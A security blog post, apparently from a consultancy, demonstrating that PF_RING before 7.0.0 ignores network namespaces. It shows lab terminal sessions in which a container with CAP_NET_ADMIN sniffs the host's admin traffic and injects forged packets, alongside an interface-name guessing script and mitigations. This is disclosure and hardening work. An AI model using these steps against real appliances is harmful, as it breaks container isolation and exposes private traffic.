Breaking namespace isolation with PF_RING before 7.0.0
We recently helped a client design a secure network appliance that involves sniffing network traffic. The device has strict security and performance constraints.
This post shares our feedback on the unlikely integration of fast sniffers with Linux containers.
Context
Let's consider a network appliance running Linux that uses PF_RING to lift packets from the NIC and feed them to sniffers isolated in containers.
PF_RING is a faster alternative to classic raw socket sniffing. In a nutshell, packets coming from the NIC driver are placed in a circular buffer without any processing. The sniffer then calls mmap() to map that buffer into userspace and read the packets directly.
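To make the circular buffer idea concrete, here is a minimal Python sketch of a fixed-size ring shared by one producer (standing in for the kernel module) and one consumer (the sniffer). The class name, the slot count and the drop-when-full policy are illustrative assumptions; this is not PF_RING's actual memory layout or API.

```python
class PacketRing:
    """Toy fixed-size ring buffer: one producer, one consumer."""

    def __init__(self, num_slots):
        self.slots = [None] * num_slots
        self.head = 0      # next slot the producer writes to
        self.tail = 0      # next slot the consumer reads from
        self.count = 0     # slots currently holding a packet
        self.dropped = 0   # packets discarded because the ring was full

    def push(self, packet):
        """Producer side: store a packet, or drop it if the ring is full."""
        if self.count == len(self.slots):
            self.dropped += 1
            return False
        self.slots[self.head] = packet
        self.head = (self.head + 1) % len(self.slots)
        self.count += 1
        return True

    def pop(self):
        """Consumer side: return the oldest packet, or None if empty."""
        if self.count == 0:
            return None
        packet = self.slots[self.tail]
        self.slots[self.tail] = None
        self.tail = (self.tail + 1) % len(self.slots)
        self.count -= 1
        return packet


# Six packets pushed into a four-slot ring: the last two are dropped.
ring = PacketRing(num_slots=4)
for i in range(6):
    ring.push(b"pkt%d" % i)
print(ring.count, ring.dropped)
```

The point of the design is that the consumer never asks the kernel for each packet: both sides only move indices over a shared region, which is what makes the approach fast and also what makes access control on that region so important.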
Given the security hardening requirements of the appliance, the sniffer should be as isolated as possible, and that isolation should cost as little performance as possible. Containers are a pretty good fit for this use case.
Before version 7.0.0 (the latest release as of this writing), PF_RING didn't support network namespaces. The only way for the sniffers to access the circular packet buffer was to grant the container the CAP_NET_ADMIN capability. Granting that capability to a "normal" hardened container isn't great, but with PF_RING it's worse...
Example architecture
Consider the following design for a dummy network sniffer:
To make troubleshooting quick, all containers are fully fledged Ubuntu distributions. In a real-life scenario the ids-container would be minimal and hardened. LXC v2 is used, but the setup could be replicated with the container runtime of your choice.
The host system has 2 network interfaces:
- administration is performed on the secure LAN if-admin
- sniffing is possible on the interface if-sniff
root@host:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: if-admin: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 52:54:00:4c:97:df brd ff:ff:ff:ff:ff:ff
inet 192.168.122.221/24 brd 192.168.122.255 scope global if-admin
valid_lft forever preferred_lft forever
inet6 fe80::5054:ff:fe4c:97df/64 scope link
valid_lft forever preferred_lft forever
3: if-sniff: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 22:22:22:22:22:22 brd ff:ff:ff:ff:ff:ff
inet 192.168.110.2/24 brd 192.168.110.255 scope global if-sniff
valid_lft forever preferred_lft forever
inet6 fe80::2022:22ff:fe22:2222/64 scope link
valid_lft forever preferred_lft forever
4: br0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
link/ether fe:f8:d8:60:13:37 brd ff:ff:ff:ff:ff:ff
inet 192.168.0.1/24 brd 192.168.0.255 scope global br0
valid_lft forever preferred_lft forever
inet6 fe80::4030:e8ff:fe9a:c32b/64 scope link
valid_lft forever preferred_lft forever
6: veth89U9YK@if5: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br0 state UP group default qlen 1000
link/ether fe:f8:d8:60:13:37 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet6 fe80::fcf8:d8ff:fe60:1337/64 scope link
valid_lft forever preferred_lft forever
root@host:~# ls -l /proc/self/ns/net
lrwxrwxrwx 1 root root 0 May 4 14:40 /proc/self/ns/net -> net:[4026531957]
veth89U9YK@if5 is the host side of the virtual interface pair whose other end is internet0 in app-container.
app-container only exposes sensitive services on the interface if-admin:
root@app-container:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
5: internet0@if6: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
link/ether 00:16:01:54:9a:34 brd ff:ff:ff:ff:ff:ff
inet 192.168.0.2/24 brd 192.168.0.255 scope global internet0
valid_lft forever preferred_lft forever
inet6 fe80::216:1ff:fe54:9a34/64 scope link
valid_lft forever preferred_lft forever
root@app-container:~# ls -al /proc/self/ns/net
lrwxrwxrwx 1 root root 0 May 4 12:48 /proc/self/ns/net -> net:[4026532250]
root@app-container:~# ss -tan
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 5 192.168.0.2:8080 *:*
# The exposed service is reachable by the administrator
admin@it:~$ curl 192.168.122.221
Hello Admin
ids-container does not have any interface configured, as it accesses if-sniff through PF_RING with CAP_NET_ADMIN:
root@ids-container:~# ip a
1: lo: <LOOPBACK> mtu 65536 qdisc noop state DOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
root@ids-container:~# ls /sys/class/net/
lo
root@ids-container:~# grep ^Cap /proc/self/status
CapInh: 0000000000000000
CapPrm: 0000000000001000
CapEff: 0000000000001000
CapBnd: 0000000000001000
CapAmb: 0000000000000000
root@ids-container:~# capsh --decode=0000000000001000
0x0000000000001000=cap_net_admin
root@ids-container:~# ls -ls /proc/self/ns/net
0 lrwxrwxrwx 1 root root 0 May 4 12:52 /proc/self/ns/net -> net:[4026532310]
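The capability mask shown above can also be decoded by hand, since each bit position corresponds to one capability number from linux/capability.h. The sketch below does what capsh --decode does for a small, deliberately incomplete table of names; the function name decode_caps is ours.

```python
# Capability bit numbers as defined in linux/capability.h (subset only).
CAP_NAMES = {
    0: "cap_chown",
    12: "cap_net_admin",
    13: "cap_net_raw",
    21: "cap_sys_admin",
}


def decode_caps(hex_mask):
    """Return the names of the capabilities set in a /proc/<pid>/status mask."""
    mask = int(hex_mask, 16)
    names = []
    bit = 0
    while mask:
        if mask & 1:
            # Fall back to a numeric label for bits missing from the table.
            names.append(CAP_NAMES.get(bit, "cap_%d" % bit))
        mask >>= 1
        bit += 1
    return names


print(decode_caps("0000000000001000"))  # the CapEff value of ids-container
```

A single bit set at position 12 confirms that CAP_NET_ADMIN is the only capability the container holds.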
Communication between app-container and ids-container is not represented, but let's say it's a channel that does not rely on the networking stack.
On the host, the PF_RING kernel module is loaded with the default configuration, and the network interfaces are correctly detected:
root@host:~# insmod ./PF_RING-6.6.0/kernel/pf_ring.ko
root@host:~# grep -r . /sys/module/pf_ring/parameters/*
/sys/module/pf_ring/parameters/enable_debug:0
/sys/module/pf_ring/parameters/enable_frag_coherence:1
/sys/module/pf_ring/parameters/enable_ip_defrag:0
/sys/module/pf_ring/parameters/enable_tx_capture:1
/sys/module/pf_ring/parameters/force_ring_lock:0
/sys/module/pf_ring/parameters/min_num_slots:4096
/sys/module/pf_ring/parameters/perfect_rules_hash_size:4096
/sys/module/pf_ring/parameters/quick_mode:0
/sys/module/pf_ring/parameters/transparent_mode:0
root@host:~# cat /proc/net/pf_ring/info
PF_RING Version : 6.6.0 (unknown)
Total rings : 0
Standard (non ZC) Options
Ring slots : 4096
Slot version : 16
Capture TX : Yes [RX+TX]
IP Defragment : No
Socket Mode : Standard
Cluster Fragment Queue : 0
Cluster Fragment Discard : 0
root@host:~# ls -1 /proc/net/pf_ring/dev/
br0 if-admin if-sniff internet0 vethLXOGMB
Breaking namespace isolation
Everything looks good: we can sniff on the interface if-sniff inside the ids-container.
root@ids-container:./PF_RING-6.6.0/userland/examples# ./pcount -i if-sniff
Capturing from if-sniff
[...]
=========================
Absolute Stats: [7 pkts rcvd][0 pkts dropped]
Total Pkts=7/Dropped=0.0 %
7 pkts [0.7 pkt/sec] - 398 bytes [0.00 Mbit/sec]
=========================
Actual Stats: 1 pkts [747.6 ms][1.34 pkt/sec]
=========================
This looks fine until you try to sniff the any interface from within the ids-container... and get the packets of if-admin.
root@ids-container:/# ./PF_RING-6.6.0/userland/examples/pcount -i any -v 2 -f 'tcp port 80'
Capturing from any
[...]
14:03:15.177815 [52:54:00:38:2D:01 -> 52:54:00:4C:97:DF] [TCP][192.168.122.1 -> 192.168.122.221] [caplen=133][len=133]
52 54 00 4C 97 DF 52 54 00 38 2D 01 08 00 45 00 00 77 D1 DE 40 00 40 06 F2 72 C0 A8 7A 01 C0 A8 7A DD D4 E0 00 50 9F 50 0F E1 22 04 08 77 50 18 00 E5 76 99 00 00 47 45 54 20 2F 20 48 54 54 50 2F 31 2E 31 0D 0A 48 6F 73 74 3A 20 31 39 32 2E 31 36 38 2E 31 32 32 2E 32 32 31 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 63 75 72 6C 2F 37 2E 35 38 2E 30 0D 0A 41 63 63 65 70 74 3A 20 2A 2F 2A 0D 0A 0D 0A
# GET / HTTP/1.1\r\nHost: 192.168.122.221\r\nUser-Agent: curl/7.58.0\r\nAccept: */*\r\n\r\n
[...]
14:03:15.178253 [52:54:00:4C:97:DF -> 52:54:00:38:2D:01] [TCP][192.168.122.221 -> 192.168.122.1] [caplen=172][len=172]
52 54 00 38 2D 01 52 54 00 4C 97 DF 08 00 45 00 00 9E A3 5E 40 00 3F 06 21 CC C0 A8 7A DD C0 A8 7A 01 00 50 D4 E0 22 04 08 88 9F 50 10 30 50 19 00 E5 76 C0 00 00 53 65 72 76 65 72 3A 20 42 61 73 65 48 54 54 50 2F 30 2E 33 20 50 79 74 68 6F 6E 2F 32 2E 37 2E 36 0D 0A 44 61 74 65 3A 20 46 72 69 2C 20 30 34 20 4D 61 79 20 32 30 31 38 20 31 34 3A 30 33 3A 31 35 20 47 4D 54 0D 0A 43 6F 6E 74 65 6E 74 2D 74 79 70 65 3A 20 61 70 70 6C 69 63 61 74 69 6F 6E 2F 74 65 78 74 0D 0A 0D 0A 48 65 6C 6C 6F 20 41 64 6D 69 6E 0A
# Server: BaseHTTP/0.3 Python/2.7.6\r\nDate: Fri, 04 May 2018 14:03:15 GMT\r\nContent-type: application/text\r\n\r\nHello Admin\n
[...]
Indeed, any should correspond to all interfaces available in the current network namespace. However, this version of PF_RING doesn't support namespace isolation, so you get access to all of the host's network interfaces, effectively breaking the isolation.
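It is worth checking that the container setup itself is not at fault. The sketch below parses the /proc/self/ns/net link targets printed earlier in this post and verifies that the host and both containers really live in three distinct network namespaces. The helper name netns_inode is ours; on a live system the link target could be obtained with os.readlink("/proc/self/ns/net").

```python
import re


def netns_inode(link_target):
    """Extract the inode number from a 'net:[N]' symlink target."""
    match = re.fullmatch(r"net:\[(\d+)\]", link_target)
    if match is None:
        raise ValueError("not a network namespace link: %r" % link_target)
    return int(match.group(1))


# Values copied from the `ls -l /proc/self/ns/net` outputs shown in this post.
observed = {
    "host": "net:[4026531957]",
    "app-container": "net:[4026532250]",
    "ids-container": "net:[4026532310]",
}

inodes = {name: netns_inode(target) for name, target in observed.items()}
all_distinct = len(set(inodes.values())) == len(inodes)
print(all_distinct)
```

Since the three inodes differ, the namespaces are set up as intended, and the leak comes from the module ignoring them rather than from a container misconfiguration.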
Sniffing on a specific host network interface is also possible:
root@ids-container:/# ./PF_RING-6.6.0/userland/examples/pcount -i if-admin -v 2 -f 'tcp port 80'
Capturing from if-admin
14:05:37.490554 [52:54:00:38:2D:01 -> 52:54:00:4C:97:DF] [TCP][192.168.122.1 -> 192.168.122.221] [caplen=74][len=74]
52 54 00 4C 97 DF 52 54 00 38 2D 01 08 00 45 00 00 3C 63 6B 40 00 40 06 61 21 C0 A8 7A 01 C0 A8 7A DD D4 EC 00 50 BC 71 0A 5C 00 00 00 00 A0 02 72 10 76 5E 00 00 02 04 05 B4 04 02 08 0A DC 3A BF 3F 00 00 00 00 01 03 03 07
[...]
One slight complication: listing the host interfaces from the container isn't possible. The pfring_findalldevs() function in the userland library ends up using the results of pfring_mod_findalldevs(), which extracts the interface names from /proc/net/pf_ring/dev/<iface>/info. Unless the LXC configuration explicitly mounts this path into the container, which should never happen, the interface names have to be guessed. A light brute force is required on systems running systemd/udev version 197 or later, which assign predictable interface names derived from the hardware topology instead of the sequential eth0, eth1, and so on.
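The guessing step can be sketched as a small generator of candidate names. The patterns below (legacy ethN plus the enoN, ensN and enpXsY forms of the predictable naming scheme) and the index ranges are assumptions chosen for illustration; a renamed interface such as if-admin in our lab would not be found this way and would have to come from a custom wordlist.

```python
def candidate_names(max_index=4, max_bus=4, max_slot=4):
    """Yield plausible interface names, most common patterns first."""
    for i in range(max_index):
        yield "eth%d" % i                    # legacy kernel naming
    for i in range(max_index):
        yield "eno%d" % (i + 1)              # onboard devices
    for i in range(max_index):
        yield "ens%d" % (i + 1)              # hotplug slots
    for bus in range(max_bus):
        for slot in range(max_slot):
            yield "enp%ds%d" % (bus, slot)   # PCI bus and slot


names = list(candidate_names())
print(len(names), names[:3], names[-1])
```

Each candidate would then be handed to a capture tool, for instance pcount -i <name>, keeping the names for which the capture starts successfully.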
Loading the PF_RING module with the default configuration also allows writing packets to network interfaces.
root@host:~# grep TX /proc/net/pf_ring/info
Capture TX : Yes [RX+TX]
To demonstrate that an arbitrary packet can be injected from ids-container to app-container through PF_RING, a single UDP datagram is captured to a pcap file and later injected:
# Captured packet to inject
root@ids-container:~# tcpdump -XX -r UDP_test_packet.pcap
reading from file UDP_test_packet.pcap, link-type EN10MB (Ethernet)
16:48:13.894163 IP 192.168.122.1.54219 > 192.168.122.221.1234: UDP, length 5
0x0000: 5254 004c 97df 5254 0038 2d01 0800 4500 RT.L..RT.8-...E.
0x0010: 0021 2982 4000 4011 9b1a c0a8 7a01 c0a8 .!).@.@.....z...
0x0020: 7add d3cb 04d2 000d 764e 4142 4344 0a z.......vNABCD.
root@ids-container:./PF_RING-6.6.0/userland/examples# ./pfsend -f /UDP_test_packet.pcap -i internet0 -m 00:16:01:3b:aa:a7 -b 1 -v -S 192.168.0.3 -D 192.168.0.2 -z
Sending packets on internet0
Using PF_RING v.6.6.0
Read 47 bytes packet from pcap file /UDP_test_packet.pcap [0.0 Secs = 0 ticks@0hz from beginning]
Read 1 packets from pcap file /UDP_test_packet.pcap
Dumping statistics on /proc/net/pf_ring/stats/2737-internet0.16
[0] pfring_send(47) returned 47
TX rate: [current 7'751.93 pps/0.00 Gbps][average 7'751.93 pps/0.00 Gbps][total 1.00 pkts]
Sent 1 packets
# In `app-container`, the forged packet is received
root@app-container:/# tcpdump -vv -n -i internet0 -XX
tcpdump: listening on internet0, link-type EN10MB (Ethernet), capture size 262144 bytes
15:50:40.297378 IP (tos 0x0, ttl 64, id 10626, offset 0, flags [DF], proto UDP (17), length 33)
192.168.0.3.54219 > 192.168.0.2.1234: [udp sum ok] UDP, length 5
0x0000: 0016 013b aaa7 5254 0038 2d01 0800 4500 ...;..RT.8-...E.
0x0010: 0021 2982 4000 4011 8ff4 c0a8 0003 c0a8 .!).@.@.........
0x0020: 0002 d3cb 04d2 000d 175a 4142 4344 0a .........ZABCD.
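Comparing the two dumps, the destination MAC, both IP addresses and the checksums differ between the captured and the received packet, which is consistent with pfsend rewriting the addresses given on its command line and recomputing the checksums. As a sanity check, the sketch below recomputes the IPv4 header checksum (the one's-complement sum described in RFC 1071) over both 20-byte headers copied from the tcpdump outputs above. The function name is ours.

```python
import struct


def ipv4_header_checksum(header):
    """Compute the IPv4 header checksum, ignoring the stored checksum field."""
    if len(header) % 2:
        raise ValueError("header length must be even")
    # Bytes 10-11 hold the checksum; they count as zero during computation.
    zeroed = header[:10] + b"\x00\x00" + header[12:]
    total = sum(struct.unpack("!%dH" % (len(zeroed) // 2), zeroed))
    # Fold the carries back into the low 16 bits.
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


# IPv4 headers taken from the two hex dumps (checksum field included).
captured = bytes.fromhex("45000021298240004011" "9b1a" "c0a87a01c0a87add")
injected = bytes.fromhex("45000021298240004011" "8ff4" "c0a80003c0a80002")

print("%04x" % ipv4_header_checksum(captured))  # stored value: 9b1a
print("%04x" % ipv4_header_checksum(injected))  # stored value: 8ff4
```

Both recomputed values match the ones stored in the packets, so the forged datagram is a valid packet from the point of view of the receiving stack, as the "udp sum ok" reported by tcpdump also suggests for the UDP layer.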
Mitigation
Upgrade to version 7.0.0 of PF_RING: this latest version fixes the namespace isolation problem and introduces capture interface whitelisting. If upgrading is not possible, proper configuration of the kernel module and hardening of both host and containers can reduce the risk.
Additionally, "Capture TX" should be disabled if your sniffer doesn't use it.
root@host:~# insmod ./pf_ring.ko enable_tx_capture=0
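These two checks are easy to automate on the host. The following sketch parses text in the format of /proc/net/pf_ring/info as shown earlier in this post and reports a version older than 7.0.0 or an enabled TX capture. The function names and the wording of the findings are ours, and the sample is an excerpt of the output above rather than a live read.

```python
import re


def parse_pf_ring_info(text):
    """Parse 'Key : Value' lines from /proc/net/pf_ring/info into a dict."""
    info = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            info[key.strip()] = value.strip()
    return info


def audit(info):
    """Return a list of findings for the two mitigations discussed above."""
    findings = []
    match = re.match(r"(\d+)\.(\d+)\.(\d+)", info.get("PF_RING Version", ""))
    version = tuple(int(part) for part in match.groups()) if match else None
    if version is None or version < (7, 0, 0):
        findings.append("PF_RING older than 7.0.0: no namespace support")
    if info.get("Capture TX", "").startswith("Yes"):
        findings.append("TX capture is enabled")
    return findings


# Excerpt of the /proc/net/pf_ring/info output shown earlier in this post.
SAMPLE = """\
PF_RING Version : 6.6.0 (unknown)
Total rings : 0
Capture TX : Yes [RX+TX]
"""

for finding in audit(parse_pf_ring_info(SAMPLE)):
    print(finding)
```

On a real host the text would come from reading /proc/net/pf_ring/info, and the same check could be run at boot or from a monitoring agent.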
Conclusion
We have seen that despite the use of containers, some external components don't support namespaces. In our setup, the isolated sniffer could in fact:
- Monitor the administration network interface
- Inject traffic to any network interface
- Route packets between all network interfaces
- Exfiltrate sniffed packets back to the attacker
The thing to remember here is that PF_RING is just one example. The same type of vulnerability might be found with netmap, DPDK, Snabbswitch, etc. "This is left as an exercise for the reader" ;)
Performance and security are not always such good friends.